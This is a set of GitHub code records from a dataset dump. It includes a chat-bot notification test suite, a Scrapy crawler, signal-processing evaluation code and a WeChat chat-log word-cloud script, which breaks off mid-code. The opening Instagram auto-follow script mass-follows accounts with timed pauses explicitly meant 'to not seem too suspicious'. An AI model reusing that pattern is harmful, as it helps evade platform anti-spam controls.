\"\\n\")\n\n #Traversing and following each of the users in the followers list\n count = 0\n for follower in followers:\n #Printing out the current person's information\n print(str(follower['full_name']).translate(non_bmp_map) + \"\\n\\t\" + (str(follower['pk'])) + \"\\n\\t\" + str(count))\n \n #Following the current person by their UserID\n api.follow(follower['pk'])\n\n #Incrementing the current count\n count += 1\n\n #Generating a time to sleep for between 8 - 12 seconds\n randomTime = random.randint(1500, 2000) / 100\n\n #Sleeping for that time\n time.sleep(randomTime)\n\n #Every 10 follows, we will wait 20 seconds to not seem too suspicious\n if(count % 10 == 0):\n print(\"Taking a break...\")\n time.sleep(20)\n if(count >= 300):\n break\n print(\"\\nDone with User ID: \" + str(userID) + \"\\n\")\n except Exception as e:\n print(\"User ID: \" + str(user) + \" caused an error\")\n print(str(e))\n time.sleep(60*15)\n print(\"Completely Done!\")\n","repo_name":"JHerrmann01/InstagramUserScript","sub_path":"AutoFollow.py","file_name":"AutoFollow.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13391612147","text":"import json\nimport logging\nimport re\nimport time\nimport threading\nimport traceback\nfrom itertools import product\nfrom queue import SimpleQueue\nfrom types import SimpleNamespace\nfrom unittest import mock\n\nimport pytest\n\n\nclass _NotificationsTestsBase:\n @pytest.fixture(autouse=True)\n def setup_notifications(self, tmp_path, caplog):\n \"\"\"Fixtures for notifications tests\n\n - Provide Notifications instance self.notifications with temporary file\n location (available as self.filepath)\n\n - Capture Notifications.py logging in self.logs\n\n \"\"\"\n self.filepath = tmp_path / \"notifications.json\"\n self.create_notifications()\n\n self.logs = caplog\n self.logs.set_level(logging.INFO, logger=\"Notifications\")\n\n def create_notifications(self):\n from Notifications import Notifications\n\n self.notifications = Notifications([17, 42], self.filepath)\n\n @property\n def saved_notifications(self):\n try:\n return json.loads(self.filepath.read_text())[0]\n except FileNotFoundError:\n return None\n\n @property\n def saved_users(self):\n try:\n return json.loads(self.filepath.read_text())[1]\n except FileNotFoundError:\n return None\n\n\nclass TestNotifications(_NotificationsTestsBase):\n def test_list_empty(self):\n assert list(self.notifications.list()) == []\n assert list(self.notifications.list(42)) == []\n assert list(self.notifications.list(-1)) == []\n\n def test_list_all(self):\n notifications = self.notifications\n notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n notifications.add(42, r\"Monty (Python|Hall)\", 23, \"Terry Gilliam\")\n\n assert sorted(notifications.list()) == [\n (\"17\", \"foo .* bar\", \"13\", \"Graham Chapman\"),\n (\"42\", \"Monty (Python|Hall)\", \"23\", \"Terry Gilliam\"),\n ]\n\n def test_list_filtered(self):\n notifications = self.notifications\n notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n notifications.add(42, r\"foo .* bar\", 13, \"Graham Chapman\")\n notifications.add(42, r\"Monty (Python|Hall)\", 23, \"Terry Gilliam\")\n\n assert list(notifications.list(room=17)) == [\n (\"17\", \"foo .* bar\", \"13\", \"Graham Chapman\")\n ]\n assert list(notifications.list(room=42)) == [\n (\"42\", \"foo .* bar\", \"13\", \"Graham Chapman\"),\n (\"42\", \"Monty (Python|Hall)\", \"23\", \"Terry Gilliam\"),\n ]\n\n assert list(notifications.list(user=13)) == [\n (\"17\", \"foo .* bar\", \"13\", \"Graham Chapman\"),\n (\"42\", \"foo .* bar\", \"13\", \"Graham Chapman\"),\n ]\n assert list(notifications.list(user=23)) == [\n (\"42\", \"Monty (Python|Hall)\", \"23\", \"Terry Gilliam\"),\n ]\n\n assert list(notifications.list(room=42, user=13)) == [\n (\"42\", \"foo .* bar\", \"13\", \"Graham Chapman\"),\n ]\n\n assert list(notifications.list(room=9999)) == []\n assert list(notifications.list(room=9999, user=13)) == []\n assert list(notifications.list(user=9999)) == []\n assert list(notifications.list(room=42, user=9999)) == []\n\n def test_add(self):\n notifications = self.notifications\n notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n notifications.add(42, r\"Monty (Python|Hall)\", 23, \"Terry Gilliam\")\n\n assert self.saved_notifications == {\n \"17\": {\"foo .* bar\": [\"13\"]},\n \"42\": {\"Monty (Python|Hall)\": [\"23\"]},\n }\n assert self.saved_users == {\"13\": \"Graham Chapman\", \"23\": \"Terry Gilliam\"}\n\n def test_add_nonexistent(self):\n notifications = self.notifications\n notifications.add(9999, r\"foo .* bar\", 13, \"Graham Chapman\")\n\n # nothing changed, nothing saved\n assert self.saved_notifications is None\n\n def test_add_shared_pattern(self):\n notifications = self.notifications\n notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n notifications.add(17, r\"foo .* bar\", 23, \"Terry Gilliam\")\n\n assert self.saved_notifications == {\n \"17\": {\"foo .* bar\": [\"13\", \"23\"]},\n \"42\": {},\n }\n assert self.saved_users == {\"13\": \"Graham Chapman\", \"23\": \"Terry Gilliam\"}\n\n def test_add_repeated(self):\n notifications = self.notifications\n assert notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n assert not notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n\n assert self.saved_notifications == {\n \"17\": {\"foo .* bar\": [\"13\"]},\n \"42\": {},\n }\n assert self.saved_users == {\"13\": \"Graham Chapman\"}\n\n def test_remove_empty(self):\n notifications = self.notifications\n assert notifications.remove_matching(17, r\".*\", 13) == []\n assert notifications.remove_matching(999, r\".*\", 13) == []\n\n def test_remove_wrong_room(self):\n notifications = self.notifications\n notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n\n assert notifications.remove_matching(42, r\".*\", 13) == []\n assert self.saved_notifications == {\n \"17\": {\"foo .* bar\": [\"13\"]},\n \"42\": {},\n }\n\n def test_remove_shared_pattern(self):\n notifications = self.notifications\n notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n notifications.add(17, r\"foo .* bar\", 23, \"Terry Gilliam\")\n notifications.add(17, r\"foo spam bar\", 23, \"Terry Gilliam\")\n\n assert notifications.remove_matching(17, r\".*\", 13) == [\"foo .* bar\"]\n assert self.saved_notifications == {\n \"17\": {\"foo .* bar\": [\"23\"], \"foo spam bar\": [\"23\"]},\n \"42\": {},\n }\n\n def test_remove_exact_match(self):\n notifications = self.notifications\n notifications.add(17, r\"Monty (Python|Hall)\", 13, \"Graham Chapman\")\n notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n\n assert notifications.remove_matching(17, r\"Monty (Python|Hall)\", 13) == [\n \"Monty (Python|Hall)\"\n ]\n assert self.saved_notifications == {\n \"17\": {\"foo .* bar\": [\"13\"]},\n \"42\": {},\n }\n\n def test_remove_multiple(self):\n notifications = self.notifications\n notifications.add(17, r\"Monty (Python|Hall)\", 13, \"Graham Chapman\")\n notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n notifications.add(17, r\"(PYTHON|RUBY)\", 13, \"Graham Chapman\")\n\n assert sorted(notifications.remove_matching(17, r\"python\", 13)) == [\n \"(PYTHON|RUBY)\",\n \"Monty (Python|Hall)\",\n ]\n\n def test_remove_duplicate_user_only(self):\n # list the same user more than once for a pattern\n # one of two variants: with no other users there\n with self.filepath.open(\"w\", encoding=\"utf8\") as f:\n json.dump(\n [{\"17\": {\"pattern\": [\"13\", \"13\", \"13\"]}}, {\"13\": \"Graham Chapman\"},], f,\n )\n self.create_notifications()\n notifications = self.notifications\n notifications.remove_matching(17, r\"pattern\", 13) == [\"pattern\"]\n\n assert self.saved_notifications == {\"17\": {}, \"42\": {}}\n\n def test_remove_duplicate_user_shared(self):\n # list the same user more than once for a pattern\n # one of two variants: with another user there\n with self.filepath.open(\"w\", encoding=\"utf8\") as f:\n json.dump(\n [\n {\"17\": {\"pattern\": [\"13\", \"23\", \"13\", \"13\"]}},\n {\"13\": \"Graham Chapman\", \"23\": \"Terry Gilliam\"},\n ],\n f,\n )\n self.create_notifications()\n notifications = self.notifications\n notifications.remove_matching(17, r\"pattern\", 13) == [\"pattern\"]\n\n assert self.saved_notifications == {\"17\": {\"pattern\": [\"23\"]}, \"42\": {}}\n\n def test_filter_empty(self):\n notifications = self.notifications\n\n post = \"Lorum ipsum dolor\"\n assert notifications.filter_post(17, post) == post\n assert notifications.filter_post(42, post) == post\n assert notifications.filter_post(999, post) == post\n\n def test_filter_post_room(self):\n notifications = self.notifications\n notifications.add(17, r\"[Ll]\\w+ ipsum\", 13, \"Graham Chapman\")\n notifications.add(17, r\".*\", 83, \"Terry Gilliam\")\n notifications.add(17, r\"Knights of .*\", 97, \"John Cleese\")\n notifications.add(42, r\".*\", 31, \"Eric Idle\")\n notifications.add(42, r\"Lorum .*\", 23, \"Michael Palin\")\n\n post = \"Lorum ipsum dolor\"\n msg = notifications.filter_post(17, post)\n assert msg.startswith(post)\n assert sorted(msg[len(post) :].split()) == [\"@GrahamChapman\", \"@TerryGilliam\"]\n msg = notifications.filter_post(42, post)\n assert msg.startswith(post)\n assert sorted(msg[len(post) :].split()) == [\"@EricIdle\", \"@MichaelPalin\"]\n\n\n# extract just the word groups at the start\n_clean_usage = re.compile(r'^(?:\\w+[ ])*\\w+').search\n\n\nclass _CommandsTestsBase(_NotificationsTestsBase):\n def dispatch(self, content, room=17, user_id=13, user_name=\"Graham Chapman\"):\n \"\"\"Simulate BotpySE's command handling for tests\"\"\"\n from Notifications import NotificationsCommandBase\n\n commands = {\n _clean_usage(usage)[0]: c\n for c in NotificationsCommandBase.__subclasses__()\n for usage in c.usage()\n }\n\n # BotpySE lowercases messages when building the argument list\n cmd, *arguments = content.lower().split()\n\n # Handle commands with more than one word\n while arguments and cmd not in commands:\n cmd = f\"{cmd} {arguments.pop(0)}\"\n\n # mock out a command manager, user, room and message object\n command_manager = mock.Mock(notifications=self.notifications)\n user = mock.Mock(id=user_id)\n user.configure_mock(name=user_name) # can't set name any other way\n message = mock.Mock(user=user, room=mock.Mock(id=room), content=content)\n\n # capture responses sent via Command.post and Command.reply\n output = SimpleNamespace(reply=[], post=[])\n message.message.reply.side_effect = lambda t, **k: output.reply.append(t)\n message.room.send_message.side_effect = lambda t, **k: output.post.append(t)\n\n commands[cmd](command_manager, message, arguments).run()\n\n return output\n\n\nclass TestCommands(_CommandsTestsBase):\n def test_notifications_empty(self):\n response = \" | User | Regex |\\n |--------+---------|\"\n assert self.dispatch(\"notifications\").post == [response]\n assert self.dispatch(\"notifications\", room=42).post == [response]\n assert self.dispatch(\"all notifications\").post == [response]\n assert self.dispatch(\"all notifications\", room=42).post == [response]\n\n def test_notifications_filtered(self):\n notifications = self.notifications\n notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n notifications.add(42, r\"Monty (Python|Hall)\", 23, \"Terry Gilliam\")\n\n output = self.dispatch(\"notifications\")\n assert output.post[0].splitlines()[2:] == [\n \" | Graham Chapman | foo .* bar |\"\n ]\n\n assert self.dispatch(\"all notifications\").post == output.post\n\n def test_my_notifications_empty(self):\n response = (\n \" | Graham Chapman |\\n\"\n \" | Regex |\\n\"\n \" |------------------|\"\n )\n assert self.dispatch(\"my notifications\").post == [response]\n assert self.dispatch(\"my notifications\", room=42).post == [response]\n\n def test_my_notifications_filtered(self):\n notifications = self.notifications\n notifications.add(17, r\"foo .* bar\", 13, \"Graham Chapman\")\n notifications.add(17, r\"^spammy.*$\", 97, \"John Cleese\")\n notifications.add(42, r\"foo\", 23, \"Terry Gilliam\")\n\n output = self.dispatch(\"my notifications\")\n lines = output.post[0].splitlines()\n assert lines[0] == \" | Graham Chapman |\"\n assert lines[3:] == [\n \" | foo .* bar |\"\n ]\n\n def test_notify_case_sensitive(self):\n pat = \"pat with spacing and UPPERCASE\"\n output = self.dispatch(f\"notify {pat}\")\n assert output.reply == [f\"Added notification for Graham Chapman for `{pat}`\"]\n assert self.saved_notifications == {\"17\": {pat: [\"13\"]}, \"42\": {}}\n\n def test_notify_invalid_pattern(self):\n pat = \"(pat incomplete\"\n output = self.dispatch(f\"notify {pat}\")\n assert output.reply == [\n f\"Could not add notification `{pat}`: \"\n \"missing ), unterminated subpattern at position 0\"\n ]\n\n def test_notify_existing(self):\n pat = \".*\"\n self.notifications.add(17, pat, 13, \"Graham Chapman\")\n output = self.dispatch(f\"notify {pat}\")\n assert output.reply == [\n f\"Pattern `{pat}` already registered for Graham Chapman\"\n ]\n\n def test_notify_normalised(self):\n pat = \"Euro: \\u20AC\"\n pat_html = \"Euro: €\"\n output = self.dispatch(f\"notify {pat_html}\")\n assert output.reply == [f\"Added notification for Graham Chapman for `{pat}`\"]\n\n output = self.dispatch(f\"notify {pat}\")\n assert output.reply == [\n f\"Pattern `{pat}` already registered for Graham Chapman\"\n ]\n\n output = self.dispatch(f\"notify {pat_html}\")\n assert output.reply == [\n f\"Pattern `{pat}` already registered for Graham Chapman\"\n ]\n\n output = self.dispatch(\"notify (\")\n assert output.reply == [\n \"Could not add notification `(`: \"\n \"missing ), unterminated subpattern at position 0\"\n ]\n\n def test_unnotify_missing(self):\n pat = \"foo .* bar\"\n output = self.dispatch(f\"unnotify {pat}\")\n assert output.reply == [f\"No matches on `{pat}` for Graham Chapman\"]\n\n def test_unnotify_invalid_pattern(self):\n pat = \"(pat incomplete\"\n output = self.dispatch(f\"unnotify {pat}\")\n assert output.reply == [\n f\"Could not remove notification `{pat}`: \"\n \"missing ), unterminated subpattern at position 0\"\n ]\n\n def test_unnotify_case_sensitivity(self):\n # this pattern would not match itself, so would only match as literal text\n pat1 = r\"^pat \\w with spacing and UPPERCASE\"\n # this pattern is going to be matched with a case-insensitive general search\n pat2 = r\"foo .* BAR\"\n self.notifications.add(17, pat1, 13, \"Graham Chapman\")\n self.notifications.add(17, pat2, 13, \"Graham Chapman\")\n\n output = self.dispatch(f\"unnotify {pat1}\")\n assert output.reply == [f\"Removed notifications: `{pat1}`\"]\n\n output = self.dispatch(f\"unnotify ^foo.*bar$\")\n assert output.reply == [f\"Removed notifications: `{pat2}`\"]\n\n def test_unnotify_normalised(self):\n pat = \"Euro: \\u20AC\"\n self.notifications.add(17, pat, 13, \"Graham Chapman\")\n\n pat_html = \"Euro: €\"\n output = self.dispatch(f\"unnotify {pat_html}\")\n assert output.reply == [f\"Removed notifications: `{pat}`\"]\n\n output = self.dispatch(f\"unnotify {pat_html}\")\n assert output.reply == [f\"No matches on `{pat}` for Graham Chapman\"]\n\n output = self.dispatch(\"unnotify (\")\n assert output.reply == [\n \"Could not remove notification `(`: \"\n \"missing ), unterminated subpattern at position 0\"\n ]\n\n def test_command_logging(self):\n self.dispatch(\"notifications\", room=42, user_id=19)\n self.dispatch(\"notify ^\\\\w+\", room=17, user_id=23)\n self.dispatch(\"unnotify ^\\\\w+\", room=81, user_id=31)\n assert self.logs.record_tuples == [\n (\"Notifications\", logging.INFO, \"NOTIFICATIONS by 19 in 42\"),\n (\"Notifications\", logging.INFO, \"NOTIFY 23 in 17 for ^\\\\w+\"),\n (\"Notifications\", logging.INFO, \"UNNOTIFY ^\\\\w+ for 31 in 81\"),\n ]\n\n @mock.patch(\"Notifications.Notifications.add\")\n def test_exception(self, add_mock):\n \"\"\"Introduce an exception in notifications.add and verify it is handled\"\"\"\n exc = ValueError(\"mocked exception\")\n add_mock.side_effect = exc\n command = \"notify foo .* bar\"\n output = self.dispatch(command)\n assert output.reply == [\n f\"Oops, the {command} command encountered a problem: {exc!r}\"\n ]\n\n assert [r.levelno for r in self.logs.records] == [logging.INFO, logging.ERROR]\n assert self.logs.records[1].msg == \"CommandNotify.run(*(), **{}) failed\"\n assert self.logs.records[1].exc_info[:2] == (type(exc), exc)\n\n\ndef _wait_for(threads, timeout):\n \"\"\"wait *timeout* seconds for threads to exit\n\n Returns True if all threads have exited, False otherwise.\n \"\"\"\n end = time.monotonic() + timeout\n while time.monotonic() < end and any(t.is_alive() for t in threads):\n for thread in threads:\n thread.join(0.1)\n return not any(t.is_alive() for t in threads)\n\n\nclass TestThreading(_CommandsTestsBase):\n \"\"\"Stress-test the commands and see if the final state is consistent.\n\n This test can't definitively prove thread-safety but *should* fail if\n there are problems, most of the time. You can verify that the test\n fails if there is no thread-safity by using:\n\n pytest -k test_threading --disable-notification-locking\n\n To really push the issue, run the test repeatedly:\n\n pip install pytest-repeat\n pytest -k test_threading --count=100 -x --disable-notification-locking\n\n \"\"\"\n\n THREADCOUNT = 23\n TIMEOUT = 5.0 # seconds\n\n _exit = threading.Event()\n\n def runner(self, tid, exception_queue, *commands):\n for command in commands:\n if self._exit.is_set():\n return\n try:\n self.dispatch(**command)\n for r in self.logs.records:\n if (\n r.threadName == tid # triggered by this thread\n and r.levelno == logging.ERROR # and it's an error\n ):\n exception_queue.put((tid, command, r.exc_info[1]))\n return\n except Exception as exc:\n exception_queue.put((tid, command, exc))\n return\n\n def test_threading(self):\n # capture errors in commands\n self.logs.set_level(logging.ERROR, logger=\"Notifications\")\n\n # set up definitions for a few users and rooms to generate commands with\n users = {\n 13: \"Graham Chapman\",\n 23: \"Michael Palin\",\n 83: \"Terry Gilliam\",\n 97: \"John Cleese\",\n }\n rooms = (17, 42)\n messages = (\n \"notify ^foobar$\",\n \"notifications\",\n \"notify ^foo .* bar$\",\n \"notifications\",\n \"notify ^spammy.*$\",\n \"notifications\",\n \"notify barry*\",\n \"notifications\",\n \"notify ^\\\\w+$\",\n \"notifications\",\n )\n\n # series of arguments for _CommandsTestsBase.dispatch\n commands = [\n {\"room\": rid, \"user_id\": uid, \"user_name\": users[uid], \"content\": cmd,}\n for cmd, uid, rid in product(messages, users, rooms)\n ]\n # A single pattern registered to a single user causes the\n # notifications[roomid] dictionary to grow and shrink repeatedly\n # which can cause errors if something else is also iterating over\n # the same.\n iuid, iuname = 31, \"Eric Idle\"\n interference = [\n {\"room\": rid, \"user_id\": iuid, \"user_name\": iuname, \"content\": c}\n for rid, c in product(\n rooms, (\"notify \\\\b[45]/5\\\\b\", \"unnotify \\\\b[45]/5\\\\b\")\n )\n ] * (len(commands) // 4)\n\n exception_queue = SimpleQueue()\n # threads are marked as daemon threads so a deadlocked thread never\n # holds up the test.\n threads = [\n threading.Thread(\n target=self.runner,\n args=(\"notify\", exception_queue, *commands),\n name=\"notify\",\n daemon=True,\n ),\n *(\n threading.Thread(\n target=self.runner,\n args=(f\"interference-{i}\", exception_queue, *interference),\n name=f\"interference-{i}\",\n daemon=True,\n )\n for i in range(self.THREADCOUNT - 1)\n ),\n ]\n\n for t in threads:\n t.start()\n\n if not _wait_for(threads, self.TIMEOUT):\n # test failed, threads didn't complete in the timeout.\n # Attempt to recover by setting the exit event, then waiting another few\n # seconds. This is just a courtesy at this point, as daemon threads won't\n # block Python from exiting.\n self._exit.set()\n _wait_for(threads, 3)\n pytest.fail(\"Threads didn't complete\", False)\n\n # any issues with errors will have been reported by the thread runner\n # so no need to report twice.\n self.logs.clear()\n\n if not exception_queue.empty():\n lines = [\"One or more messages triggered an exception:\\n\"]\n while not exception_queue.empty():\n tid, command, exc = exception_queue.get(False)\n lines.append(f\"\\nThread: {tid}\\nCommand: {command}\\n\")\n lines += traceback.format_exception(None, exc, exc.__traceback__)\n del exc # clear exception to avoid leaks\n\n pytest.fail(\"\".join(lines), False)\n\n patterns = [p[7:] for p in messages if p != \"notifications\"]\n assert {\n rid: {p: sorted(users) for p, users in pat.items()}\n for rid, pat in self.saved_notifications.items()\n } == {\n str(rid): {pat: [str(uid) for uid in sorted(users)] for pat in patterns}\n for rid in rooms\n }\n\n users[iuid] = iuname # the interference user also registered\n assert self.saved_users == {\n str(uid): user_name for uid, user_name in users.items()\n }\n","repo_name":"Charcoal-SE/PulseMonitor","sub_path":"tests/test_notifications.py","file_name":"test_notifications.py","file_ext":"py","file_size_in_byte":22451,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"74509098083","text":"def solution(N, stages):\n length = len(stages) #8\n answer = []\n stagedA=[0]*(N+1)\n stagedB=[0]*(N+1)\n newArr=[]\n for i in range(length):\n stagedA[stages[i]-1] += 1\n stagedB[-1]=stagedA[-1]\n\n for i in range(N-1,-1,-1):\n stagedB[i] = stagedB[i+1] + stagedA[i]#N-1,i+1조심\n res = 1\n for i in stagedB:\n if i:\n res*=i\n ans = []\n for i in range(N):\n x=0\n if stagedB[i]:\n x = (res//stagedB[i])*stagedA[i]\n else:\n x=0\n ans.append(x)\n dic = dict()\n for i in range(N):\n dic[i+1] = ans[i]\n #print(\"stagedA\",stagedA)\n #print(\"stagedB\",stagedB)\n #print(dic)\n new_dic = sorted(dic.items(),key=lambda x:x[1], reverse=True )\n #print(new_dic)\n for i in new_dic:\n answer.append(i[0])\n\n return answer","repo_name":"young0264/hellopycharm","sub_path":"프로그래머스/실패율.py","file_name":"실패율.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29091837591","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass WordsSpider(scrapy.Spider):\n name = 'words'\n allowed_domains = ['amazon.com']\n start_urls = ['http://amazon.com/']\n\n words_to_find = {\n \"virtue\": False,\n \"signalling\": False,\n \"is\": False,\n \"society's\": False,\n \"version\": False,\n \"of\": False,\n \"proof\": False,\n \"stake\": False\n }\n\n def parse(self, response):\n\n links = response.css('a::attr(href)').extract()\n\n body = str(response.body)\n\n for key, value in self.words_to_find.items():\n if not value:\n if key in body:\n self.words_to_find[key] = True\n\n is_found = True\n for key, value in self.words_to_find.items():\n if not value:\n is_found = False\n\n if is_found:\n print('All words are found')\n return\n\n else:\n print(self.words_to_find)\n for link in links:\n if link.startswith('https://www.amazon.com'):\n yield response.follow(link, self.parse)\n\n\n\n\n\n\n\n\n","repo_name":"SuperMasterBlasterLaser/amazon_crawler","sub_path":"crawler/spiders/words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73604838565","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nn = 10 #Number of samples\ng = np.random.normal(loc = 50, scale= 1.5, size=n) #Measurements\n\n# Values of the resistance from the average and least squares (to be calculated)\navg = 0\nlsq = 0\n\n# Plotting measurements for illustration purposes\nfig, axs = plt.subplots()\naxs.plot(g, '--o')\naxs.set_title(f'Measurements - Avg = {avg:.3f} - lsq = {lsq:0.3f}')\naxs.set_xlabel('Number of sample')\naxs.set_ylabel('Resistance [mOhm]')\nplt.show()","repo_name":"WeRoLab/intermediate-controls","sub_path":"Python/IC_HW5_LeastSquares.py","file_name":"IC_HW5_LeastSquares.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12861195348","text":"from importlib.resources import path\nfrom unittest import result\nimport numpy as np\nimport pandas as pd\nimport time\n\nfrom tqdm import tqdm\nfrom pathlib import Path\nfrom scipy.signal import stft\nfrom datetime import datetime, timedelta\nfrom pyroomacoustics.datasets.locata import LOCATA, _find_ts\n\n\nfrom pyroomacoustics.doa import MUSIC, NormMUSIC, SRP\nfrom alphaMusic.alphaMUSIC import aMUSIC\n\nbase_dir = Path(__file__).parent.absolute()\n\n\ndef main(task_in, array_in):\n path_to_locata = Path('.','data','Locata','dev')\n print(path_to_locata.exists())\n\n tasks = [task_in]\n arrays = [array_in] # 'dicit']\n\n dB = LOCATA(path_to_locata, verbose=True, tasks=tasks, arrays=arrays)\n\n results = pd.DataFrame()\n\n # LOCATA PARAMS\n Fs = 48000 \n nfft = 1024\n\n frame_sec = 0.03\n frame_size = int(Fs * frame_sec)\n block_size = 10\n\n minF = 500\n maxF = 4000\n\n for recordings in dB.recordings:\n\n \n task = recordings.meta.task\n array = recordings.meta.array\n rec = recordings.meta.rec\n\n path_to_results = base_dir / Path(f'results_locata_task:{task}_array:{array}_rec:{rec}.csv')\n if path_to_results.exists():\n continue\n\n print(f'Processing: task: {task}\\t array: {array} \\t rec: #{rec}')\n \n data = recordings.data\n fs = recordings.fs\n timestamps = recordings.ts\n \n name_srcs = list(recordings.sources.keys())\n num_srcs = len(name_srcs)\n \n # Resample VAD\n vads = {}\n for src in name_srcs:\n v = recordings.sources[src]['vad']\n vads[src] = v\n \n # Resample 48kHz -> 16kHz\n # data = resample(data.T, orig_sr=fs, target_sr=Fs)\n data = data.T\n\n if array == 'dicit':\n sub_array = [2,3,4,5,6,8,9,10,11]\n data = data[sub_array,:]\n \n # STFT\n freqs, times, stft_signals = stft(data, fs=Fs, nfft=nfft, nperseg=frame_size//4, noverlap=0)\n \n M, F, T = stft_signals.shape\n \n # iterate over frames\n starting_timestamp = recordings.get_ts(0)\n\n row = 0\n for t in tqdm(range(block_size, T-block_size, 5)):\n \n ts = times[t]\n ts = starting_timestamp + timedelta(seconds=ts)\n \n results.at[row, 'timestamp'] = times[t]\n results.at[row, 'task'] = int(task)\n results.at[row, 'array'] = array\n results.at[row, 'rec'] = rec\n \n mic_pos = recordings.get_array(ts)\n \n if array == 'dicit':\n mic_pos = mic_pos[:,sub_array]\n \n doa_dict = recordings.get_doa(ts)\n\n doas = {}\n \n num_srcs = 0\n doas_true = []\n for s, src in enumerate(doa_dict.keys()):\n \n azimuth = np.rad2deg(doa_dict[src]['azimuth'])\n\n doas[src] = azimuth\n doas_true.append(azimuth)\n \n idx = _find_ts(timestamps, ts)\n results.at[row, f'VAD_{s}'] = vads[src][idx]\n results.at[row, f'DOA_{s}'] = azimuth\n\n num_srcs += vads[src][idx]\n \n num_srcs = int(num_srcs)\n results.at[row, 'J'] = num_srcs\n\n if num_srcs == 0:\n continue\n\n if array == 'dicit':\n doa_grid = np.arange(180,step=1)\n elif array == 'dummy':\n doa_grid = np.arange(-180, 180,step=1)\n else:\n doa_grid = np.arange(360,step=1)\n\n kwargs = {'L': mic_pos,\n 'fs': Fs, \n 'nfft': nfft,\n 'azimuth': np.deg2rad(doa_grid),\n 'num_src': num_srcs,\n }\n \n algorithms = {\n 'MUSIC': MUSIC(**kwargs),\n 'aMUSIC' : aMUSIC(**kwargs,alpha=3,frequency_normalization=False),\n 'NormMUSIC': NormMUSIC(**kwargs),\n 'aNormMUSIC' : aMUSIC(**kwargs,alpha=3,frequency_normalization=True),\n 'SRP_PHAT' : SRP(**kwargs),\n }\n\n for algo_name, algo in algorithms.items():\n\n start = time.time()\n algo.locate_sources(stft_signals[:,:,t-block_size:t+block_size],\n num_src=num_srcs, \n freq_range=[minF, maxF], \n mpd=5)\n time_elapsed = time.time() - start\n\n doas_estm = np.rad2deg(algo.azimuth_recon)\n\n\n for d, doa in enumerate(doas_estm):\n results.at[row, f'{algo_name}_{d}'] = doa\n\n results.at[row, f'{algo_name}_time'] = time_elapsed\n\n row += 1\n\n print(results)\n \n results.to_csv(path_to_results)\n\n return results\n\n\nif __name__ == '__main__':\n print(base_dir)\n task = 4\n\n for array in ['benchmark2', 'dicit', 'dummy']:\n res = main(task, array)\n\n print(res)","repo_name":"matfontaine/alphaMUSIC","sub_path":"recipes/EUSIPCO22/main_locata.py","file_name":"main_locata.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74789121765","text":"import os\nimport re\nimport json\nimport jieba\nimport collections\nimport wordcloud\nimport numpy as np\nimport PIL\n\n# 将微信聊天记录中的中文词语进行词频统计,并将其生成自定义的云词图\nPRO_PATH = os.path.dirname(os.path.abspath(__file__))\nCUSSTOPWORDS = [\"不是\", \"就是\", \"还是\",\"这么\", \"怎么\", \"这个\", \"不能\",\n \"什么\", \"没有\", \"那个\", \"那么\", \"一个\", \"红包\", \"恭喜发财\",\n \"大吉大利\", \"微信\", \"领取\", \"红包\"]\n\n\n# 1 读取数据 整理中文词汇\ndef getChineseStr(chatPath):\n \"\"\"\n 读取数据 整理中文词汇\n @param: chatPath 要制作云词图的数据\n @return: chineseStr 提取出的中文字符串\n \"\"\"\n dpath = os.path.join(PRO_PATH, chatPath)\n with open(dpath, \"r\")as f:\n content = f.read()\n\n content_dic = json.loads(content.lstrip('var data = '))\n message = content_dic[\"message\"]\n ourchatstr = \"\"\n for info in message:\n if not info[\"m_nsContent\"].startswith(\"image\"):\n ourchatstr += info[\"m_nsContent\"]+\" \"\n chineseStr = re.findall(r'[\\u4e00-\\u9fa5]+', ourchatstr)\n\n return chineseStr\n\n\n# 2 jieba分词 统计词频\ndef splitWord(dataStr):\n \"\"\"\n jieba分词 统计词频\n @param: dataStr 要进行分词的字符串\n @return: allwordslist 分词后的列表\n \"\"\"\n allwordslist = jieba.lcut(\"\".join(dataStr))\n for word in allwordslist[:]:\n if len(word) == 1:\n try:\n allwordslist.remove(word)\n except:\n pass\n\n countli = collections.Counter(allwordslist)\n # list1 = sorted(countli.items(), key=lambda x: x[1], reverse=True)\n print(len(countli))\n print(countli)\n return allwordslist\n\n\n# 3 用个性化图片做背景 生成云词图\ndef genWordCloud(allwordslist, bgpicPath, newPicPath, maxWords):\n \"\"\"\n 用个性化图片做背景 生成云词图\n @param: allwordslist 分词后的列表\n bgpicPath 背景图路径\n newPicPath 生成图片路径\n maxWords 最大填充词量\n @return:\n \"\"\"\n txt = \" \".join(allwordslist)\n pic_mask = np.array(PIL.Image.open(bgpicPath))\n w = wordcloud.WordCloud(\n font_path='font/Hiragino.ttc',\n width=1000,\n height=800,\n margin=2,\n background_color='white',\n mask=pic_mask,\n max_words=maxWords,\n max_font_size=60,\n stopwords=set(CUSSTOPWORDS),\n # color_func=wordcloud.ImageColorGenerator(pic_mask),\n scale=1.5\n )\n w = w.generate(txt) # 设置的stopwords才管用\n # w = w.fit_words(dict(countli)) # 直接用词频统计的dict方式,但是这种方式下,设置stopwords不生效\n 